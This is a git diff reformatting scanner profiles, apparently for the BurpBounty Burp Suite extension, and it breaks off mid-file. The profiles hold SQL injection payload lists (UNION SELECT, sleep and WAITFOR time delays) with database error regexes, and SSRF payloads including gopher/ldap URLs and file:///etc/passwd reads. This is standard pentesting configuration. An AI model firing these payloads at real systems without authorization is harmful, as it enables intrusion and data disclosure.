+++ b/profiles/SQLi-Error-SQLmap.bb
@@ -1 +1,245 @@
-[{"Name":"SQLi-Error-SQLmap","Enabled":true,"Scanner":1,"Author":"@GochaOqradze","Payloads":["\u0027","\u0027\u0027","`","``",",","\"","\"\"","/","//","\\","\\\\",";","\u0027 or \"","-- or # ","\u0027 OR \u00271","\u0027 OR 1 -- -","\" OR \"\" \u003d \"","\" OR 1 \u003d 1 -- -","\u0027 OR \u0027\u0027 \u003d \u0027","\u0027\u003d\u0027","\u0027LIKE\u0027","\u0027\u003d0--+"," OR 1\u003d1","\u0027 OR \u0027x\u0027\u003d\u0027x","\u0027 AND id IS NULL; --","\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027UNION SELECT \u00272","%00","/*…*/ ","+","||","%","@variable","@@variable","#","AND 1","AND 0","AND true","AND false","1-false","1-true","1*56","-2","1\u0027 ORDER BY 1--+","1\u0027 ORDER BY 2--+","1\u0027 ORDER BY 3--+","1\u0027 ORDER BY 1,2--+","1\u0027 ORDER BY 1,2,3--+","1\u0027 GROUP BY 1,2,--+","1\u0027 GROUP BY 1,2,3--+","\u0027 GROUP BY columnnames having 1\u003d1 --","-1\u0027 UNION SELECT 1,2,3--+","\u0027 UNION SELECT sum(columnname ) from tablename --","-1 UNION SELECT 1 INTO @,@","-1 UNION SELECT 1 INTO @,@,@","1 AND (SELECT * FROM Users) \u003d 1","\u0027 AND MID(VERSION(),1,1) \u003d \u00275\u0027;","\u0027 and 1 in (select min(name) from sysobjects where xtype \u003d \u0027U\u0027 and name \u003e \u0027.\u0027) --",",(select * from (select(sleep(10)))a)","%2c(select%20*%20from%20(select(sleep(10)))a)","\u0027;WAITFOR DELAY \u00270:0:10\u0027--","#\t Hash comment","/*","-- -",";%00","`"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,Exception (condition )?\\d+\\. Transaction rollback","true,Or,com\\.frontbase\\.jdbc","true,Or,org\\.h2\\.jdbc","true,Or,Unexpected end of command in statement \\[\"","true,Or,Unexpected token.*?in statement \\[","true,Or,org\\.hsqldb\\.jdbc","true,Or,CLI Driver.*?DB2","true,Or,DB2 SQL error","true,Or,\\bdb2_\\w+\\(","true,Or,SQLSTATE.+SQLCODE","true,Or,com\\.ibm\\.db2\\.jcc","true,Or,Zend_Db_(Adapter|Statement)_Db2_Exception","true,Or,Pdo[./_\\\\]Ibm","true,Or,DB2Exception","true,Or,Warning.*?\\Wifx_","true,Or,Exception.*?Informix","true,Or,Informix ODBC Driver","true,Or,ODBC Informix driver","true,Or,com\\.informix\\.jdbc","true,Or,weblogic\\.jdbc\\.informix","true,Or,Pdo[./_\\\\]Informix","true,Or,IfxException","true,Or,Warning.*?\\Wingres_","true,Or,Ingres SQLSTATE","true,Or,Ingres\\W.*?Driver","true,Or,com\\.ingres\\.gcf\\.jdbc","true,Or,Dynamic SQL Error","true,Or,Warning.*?\\Wibase_","true,Or,org\\.firebirdsql\\.jdbc","true,Or,Pdo[./_\\\\]Firebird","true,Or,Microsoft Access (\\d+ )?Driver","true,Or,JET Database Engine","true,Or,Access Database Engine","true,Or,ODBC Microsoft Access","true,Or,Syntax error \\(missing operator\\) in query expression","true,Or,Driver.*? SQL[\\-\\_\\ ]*Server","true,Or,OLE DB.*? SQL Server","true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+Driver","true,Or,Warning.*?\\W(mssql|sqlsrv)_","true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}","true,Or,System\\.Data\\.SqlClient\\.SqlException","true,Or,(?s)Exception.*?\\bRoadhouse\\.Cms\\.","true,Or,Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}","true,Or,\\[SQL Server\\]","true,Or,ODBC SQL Server Driver","true,Or,ODBC Driver \\d+ for SQL Server","true,Or,SQLServer JDBC Driver","true,Or,com\\.jnetdirect\\.jsql","true,Or,macromedia\\.jdbc\\.sqlserver","true,Or,Zend_Db_(Adapter|Statement)_Sqlsrv_Exception","true,Or,com\\.microsoft\\.sqlserver\\.jdbc","true,Or,Pdo[./_\\\\](Mssql|SqlSrv)","true,Or,SQL(Srv|Server)Exception","true,Or,SQL syntax.*?MySQL","true,Or,Warning.*?\\Wmysqli?_","true,Or,MySQLSyntaxErrorException","true,Or,valid MySQL result","true,Or,check the manual that corresponds to your (MySQL|MariaDB) server version","true,Or,Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027","true,Or,MySqlClient\\.","true,Or,com\\.mysql\\.jdbc","true,Or,Zend_Db_(Adapter|Statement)_Mysqli_Exception","true,Or,Pdo[./_\\\\]Mysql","true,Or,MySqlException","true,Or,\\bORA-\\d{5}","true,Or,Oracle error","true,Or,Oracle.*?Driver","true,Or,Warning.*?\\W(oci|ora)_","true,Or,quoted string not properly terminated","true,Or,SQL command not properly ended","true,Or,macromedia\\.jdbc\\.oracle","true,Or,oracle\\.jdbc","true,Or,Zend_Db_(Adapter|Statement)_Oracle_Exception","true,Or,Pdo[./_\\\\](Oracle|OCI)","true,Or,OracleException","true,Or,PostgreSQL.*?ERROR","true,Or,Warning.*?\\Wpg_","true,Or,valid PostgreSQL result","true,Or,Npgsql\\.","true,Or,PG::SyntaxError:","true,Or,org\\.postgresql\\.util\\.PSQLException","true,Or,ERROR:\\s\\ssyntax error at or near","true,Or,ERROR: parser: parse error at or near","true,Or,PostgreSQL query failed","true,Or,org\\.postgresql\\.jdbc","true,Or,Pdo[./_\\\\]Pgsql","true,Or,PSQLException","true,Or,SQL error.*?POS([0-9]+)","true,Or,Warning.*?\\Wmaxdb_","true,Or,DriverSapDB","true,Or,com\\.sap\\.dbtech\\.jdbc","true,Or,SQLite/JDBCDriver","true,Or,SQLite\\.Exception","true,Or,(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException","true,Or,Warning.*?\\W(sqlite_|SQLite3::)","true,Or,\\[SQLITE_ERROR\\]","true,Or,SQLite error \\d+:","true,Or,sqlite3.OperationalError:","true,Or,SQLite3::SQLException","true,Or,org\\.sqlite\\.JDBC","true,Or,Pdo[./_\\\\]Sqlite","true,Or,SQLiteException","true,Or,Warning.*?\\Wsybase_","true,Or,Sybase message","true,Or,Sybase.*?Server message","true,Or,SybSQLException","true,Or,Sybase\\.Data\\.AseClient","true,Or,com\\.sybase\\.jdbc"],"Tags":["SQLi","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"SQLi-Error-SQLmap","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65,32,36,1,2,6,5,64,0,3,4],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "SQLi-Error-SQLmap",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@GochaOqradze",
+ "Payloads": [
+ "true,\u0027",
+ "true,\u0027\u0027",
+ "true,`",
+ "true,``",
+ "true,,",
+ "true,\"",
+ "true,\"\"",
+ "true,/",
+ "true,//",
+ "true,\\",
+ "true,\\\\",
+ "true,;",
+ "true,\u0027 or \"",
+ "true,-- or # ",
+ "true,\u0027 OR \u00271",
+ "true,\u0027 OR 1 -- -",
+ "true,\" OR \"\" \u003d \"",
+ "true,\" OR 1 \u003d 1 -- -",
+ "true,\u0027 OR \u0027\u0027 \u003d \u0027",
+ "true,\u0027\u003d\u0027",
+ "true,\u0027LIKE\u0027",
+ "true,\u0027\u003d0--+",
+ "true, OR 1\u003d1",
+ "true,\u0027 OR \u0027x\u0027\u003d\u0027x",
+ "true,\u0027 AND id IS NULL; --",
+ "true,\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027\u0027UNION SELECT \u00272",
+ "true,%00",
+ "true,/*…*/ ",
+ "true,+",
+ "true,||",
+ "true,%",
+ "true,@variable",
+ "true,@@variable",
+ "true,#",
+ "true,AND 1",
+ "true,AND 0",
+ "true,AND true",
+ "true,AND false",
+ "true,1-false",
+ "true,1-true",
+ "true,1*56",
+ "true,-2",
+ "true,1\u0027 ORDER BY 1--+",
+ "true,1\u0027 ORDER BY 2--+",
+ "true,1\u0027 ORDER BY 3--+",
+ "true,1\u0027 ORDER BY 1,2--+",
+ "true,1\u0027 ORDER BY 1,2,3--+",
+ "true,1\u0027 GROUP BY 1,2,--+",
+ "true,1\u0027 GROUP BY 1,2,3--+",
+ "true,\u0027 GROUP BY columnnames having 1\u003d1 --",
+ "true,-1\u0027 UNION SELECT 1,2,3--+",
+ "true,\u0027 UNION SELECT sum(columnname ) from tablename --",
+ "true,-1 UNION SELECT 1 INTO @,@",
+ "true,-1 UNION SELECT 1 INTO @,@,@",
+ "true,1 AND (SELECT * FROM Users) \u003d 1",
+ "true,\u0027 AND MID(VERSION(),1,1) \u003d \u00275\u0027;",
+ "true,\u0027 and 1 in (select min(name) from sysobjects where xtype \u003d \u0027U\u0027 and name \u003e \u0027.\u0027) --",
+ "true,,(select * from (select(sleep(10)))a)",
+ "true,%2c(select%20*%20from%20(select(sleep(10)))a)",
+ "true,\u0027;WAITFOR DELAY \u00270:0:10\u0027--",
+ "true,#\t Hash comment",
+ "true,/*",
+ "true,-- -",
+ "true,;%00",
+ "true,`"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Exception (condition )?\\d+\\. Transaction rollback",
+ "true,Or,com\\.frontbase\\.jdbc",
+ "true,Or,org\\.h2\\.jdbc",
+ "true,Or,Unexpected end of command in statement \\[\"",
+ "true,Or,Unexpected token.*?in statement \\[",
+ "true,Or,org\\.hsqldb\\.jdbc",
+ "true,Or,CLI Driver.*?DB2",
+ "true,Or,DB2 SQL error",
+ "true,Or,\\bdb2_\\w+\\(",
+ "true,Or,SQLSTATE.+SQLCODE",
+ "true,Or,com\\.ibm\\.db2\\.jcc",
+ "true,Or,Zend_Db_(Adapter|Statement)_Db2_Exception",
+ "true,Or,Pdo[./_\\\\]Ibm",
+ "true,Or,DB2Exception",
+ "true,Or,Warning.*?\\Wifx_",
+ "true,Or,Exception.*?Informix",
+ "true,Or,Informix ODBC Driver",
+ "true,Or,ODBC Informix driver",
+ "true,Or,com\\.informix\\.jdbc",
+ "true,Or,weblogic\\.jdbc\\.informix",
+ "true,Or,Pdo[./_\\\\]Informix",
+ "true,Or,IfxException",
+ "true,Or,Warning.*?\\Wingres_",
+ "true,Or,Ingres SQLSTATE",
+ "true,Or,Ingres\\W.*?Driver",
+ "true,Or,com\\.ingres\\.gcf\\.jdbc",
+ "true,Or,Dynamic SQL Error",
+ "true,Or,Warning.*?\\Wibase_",
+ "true,Or,org\\.firebirdsql\\.jdbc",
+ "true,Or,Pdo[./_\\\\]Firebird",
+ "true,Or,Microsoft Access (\\d+ )?Driver",
+ "true,Or,JET Database Engine",
+ "true,Or,Access Database Engine",
+ "true,Or,ODBC Microsoft Access",
+ "true,Or,Syntax error \\(missing operator\\) in query expression",
+ "true,Or,Driver.*? SQL[\\-\\_\\ ]*Server",
+ "true,Or,OLE DB.*? SQL Server",
+ "true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+Driver",
+ "true,Or,Warning.*?\\W(mssql|sqlsrv)_",
+ "true,Or,\\bSQL Server[^\u0026lt;\u0026quot;]+[0-9a-fA-F]{8}",
+ "true,Or,System\\.Data\\.SqlClient\\.SqlException",
+ "true,Or,(?s)Exception.*?\\bRoadhouse\\.Cms\\.",
+ "true,Or,Microsoft SQL Native Client error \u0027[0-9a-fA-F]{8}",
+ "true,Or,\\[SQL Server\\]",
+ "true,Or,ODBC SQL Server Driver",
+ "true,Or,ODBC Driver \\d+ for SQL Server",
+ "true,Or,SQLServer JDBC Driver",
+ "true,Or,com\\.jnetdirect\\.jsql",
+ "true,Or,macromedia\\.jdbc\\.sqlserver",
+ "true,Or,Zend_Db_(Adapter|Statement)_Sqlsrv_Exception",
+ "true,Or,com\\.microsoft\\.sqlserver\\.jdbc",
+ "true,Or,Pdo[./_\\\\](Mssql|SqlSrv)",
+ "true,Or,SQL(Srv|Server)Exception",
+ "true,Or,SQL syntax.*?MySQL",
+ "true,Or,Warning.*?\\Wmysqli?_",
+ "true,Or,MySQLSyntaxErrorException",
+ "true,Or,valid MySQL result",
+ "true,Or,check the manual that corresponds to your (MySQL|MariaDB) server version",
+ "true,Or,Unknown column \u0027[^ ]+\u0027 in \u0027field list\u0027",
+ "true,Or,MySqlClient\\.",
+ "true,Or,com\\.mysql\\.jdbc",
+ "true,Or,Zend_Db_(Adapter|Statement)_Mysqli_Exception",
+ "true,Or,Pdo[./_\\\\]Mysql",
+ "true,Or,MySqlException",
+ "true,Or,\\bORA-\\d{5}",
+ "true,Or,Oracle error",
+ "true,Or,Oracle.*?Driver",
+ "true,Or,Warning.*?\\W(oci|ora)_",
+ "true,Or,quoted string not properly terminated",
+ "true,Or,SQL command not properly ended",
+ "true,Or,macromedia\\.jdbc\\.oracle",
+ "true,Or,oracle\\.jdbc",
+ "true,Or,Zend_Db_(Adapter|Statement)_Oracle_Exception",
+ "true,Or,Pdo[./_\\\\](Oracle|OCI)",
+ "true,Or,OracleException",
+ "true,Or,PostgreSQL.*?ERROR",
+ "true,Or,Warning.*?\\Wpg_",
+ "true,Or,valid PostgreSQL result",
+ "true,Or,Npgsql\\.",
+ "true,Or,PG::SyntaxError:",
+ "true,Or,org\\.postgresql\\.util\\.PSQLException",
+ "true,Or,ERROR:\\s\\ssyntax error at or near",
+ "true,Or,ERROR: parser: parse error at or near",
+ "true,Or,PostgreSQL query failed",
+ "true,Or,org\\.postgresql\\.jdbc",
+ "true,Or,Pdo[./_\\\\]Pgsql",
+ "true,Or,PSQLException",
+ "true,Or,SQL error.*?POS([0-9]+)",
+ "true,Or,Warning.*?\\Wmaxdb_",
+ "true,Or,DriverSapDB",
+ "true,Or,com\\.sap\\.dbtech\\.jdbc",
+ "true,Or,SQLite/JDBCDriver",
+ "true,Or,SQLite\\.Exception",
+ "true,Or,(Microsoft|System)\\.Data\\.SQLite\\.SQLiteException",
+ "true,Or,Warning.*?\\W(sqlite_|SQLite3::)",
+ "true,Or,\\[SQLITE_ERROR\\]",
+ "true,Or,SQLite error \\d+:",
+ "true,Or,sqlite3.OperationalError:",
+ "true,Or,SQLite3::SQLException",
+ "true,Or,org\\.sqlite\\.JDBC",
+ "true,Or,Pdo[./_\\\\]Sqlite",
+ "true,Or,SQLiteException",
+ "true,Or,Warning.*?\\Wsybase_",
+ "true,Or,Sybase message",
+ "true,Or,Sybase.*?Server message",
+ "true,Or,SybSQLException",
+ "true,Or,Sybase\\.Data\\.AseClient",
+ "true,Or,com\\.sybase\\.jdbc"
+ ],
+ "Tags": [
+ "SQLi",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 0,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 2,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "SQLi-Error-SQLmap",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 65,
+ 32,
+ 36,
+ 1,
+ 2,
+ 6,
+ 5,
+ 64,
+ 0,
+ 3,
+ 4
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/SSRF-Collaborator.bb b/profiles/SSRF-Collaborator.bb
index f710da6..913a719 100755
--- a/profiles/SSRF-Collaborator.bb
+++ b/profiles/SSRF-Collaborator.bb
@@ -1 +1,102 @@
-[{"Name":"SSRF-Collaborator","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["http://{BC}","dict://{BC}","sftp://{BC}","ldap://{BC}","gopher://{BC}"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["Collaborator","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":9,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"SSRF-Collaborator","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"SSRF with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "SSRF-Collaborator",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,http://{BC}",
+ "true,dict://{BC}",
+ "true,sftp://{BC}",
+ "true,ldap://{BC}",
+ "true,gopher://{BC}"
+ ],
+ "Encoder": [
+ " "
+ ],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [],
+ "Tags": [
+ "Collaborator",
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 9,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "SSRF-Collaborator",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "SSRF with payload: \u003cbr\u003e\u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/SSRF-URLScheme.bb b/profiles/SSRF-URLScheme.bb
old mode 100644
new mode 100755
index 116f78c..e5afda3
--- a/profiles/SSRF-URLScheme.bb
+++ b/profiles/SSRF-URLScheme.bb
@@ -1 +1,100 @@
-[{"Name":"SSRF-URLScheme","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["file:///etc/passwd","file://\\/\\/etc/passwd"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":9,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"SSRF-URLScheme","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"SSRF-URLScheme with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "SSRF-URLScheme",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,file:///etc/passwd",
+ "true,file://\\/\\/etc/passwd"
+ ],
+ "Encoder": [
+ " "
+ ],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,root:x"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 9,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "SSRF-URLScheme",
+ "IssueSeverity": "High",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "SSRF-URLScheme with payload: \u003cbr\u003e\u003cpayload\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 18,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127,
+ 65,
+ 32,
+ 36,
+ 7,
+ 1,
+ 2,
+ 6,
+ 33,
+ 5,
+ 35,
+ 34,
+ 64,
+ 0,
+ 3,
+ 4,
+ 37,
+ 127
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/SecurityHeaders.bb b/profiles/SecurityHeaders.bb
old mode 100644
new mode 100755
index 496a0c1..d6254db
--- a/profiles/SecurityHeaders.bb
+++ b/profiles/SecurityHeaders.bb
@@ -1 +1,64 @@
-[{"Name":"SecurityHeaders","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,Cache-Control","true,Or,X-Frame-Options","true,Or,X-Content-Type-Options:nosniff","true,Or,Strict-Transport-Security","true,Or,X-XSS-Protection","true,Or,Content-Security-Policy"],"Tags":["All"],"PayloadResponse":false,"NotResponse":true,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Missing Security Headers","IssueSeverity":"Low","IssueConfidence":"Certain","IssueDetail":"Missing security headers detected.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "SecurityHeaders",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Cache-Control",
+ "true,Or,X-Frame-Options",
+ "true,Or,X-Content-Type-Options:nosniff",
+ "true,Or,Strict-Transport-Security",
+ "true,Or,X-XSS-Protection",
+ "true,Or,Content-Security-Policy"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": true,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 1,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Missing Security Headers",
+ "IssueSeverity": "Low",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Missing security headers detected.",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/ServerBanner.bb b/profiles/ServerBanner.bb
new file mode 100755
index 0000000..78582e4
--- /dev/null
+++ b/profiles/ServerBanner.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "ServerBanner",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Server:.*[0-9].*"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 1,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "ServerBanner",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Server banner found: \u003cbr\u003e\u003cgrep\u003e",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Software_Version_revealed.bb b/profiles/Software_Version_revealed.bb
old mode 100644
new mode 100755
index aeaf404..a0eb659
--- a/profiles/Software_Version_revealed.bb
+++ b/profiles/Software_Version_revealed.bb
@@ -1 +1,60 @@
-[{"Name":"Software_Version_revealed","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?","true,Or,(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)(?:-((?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff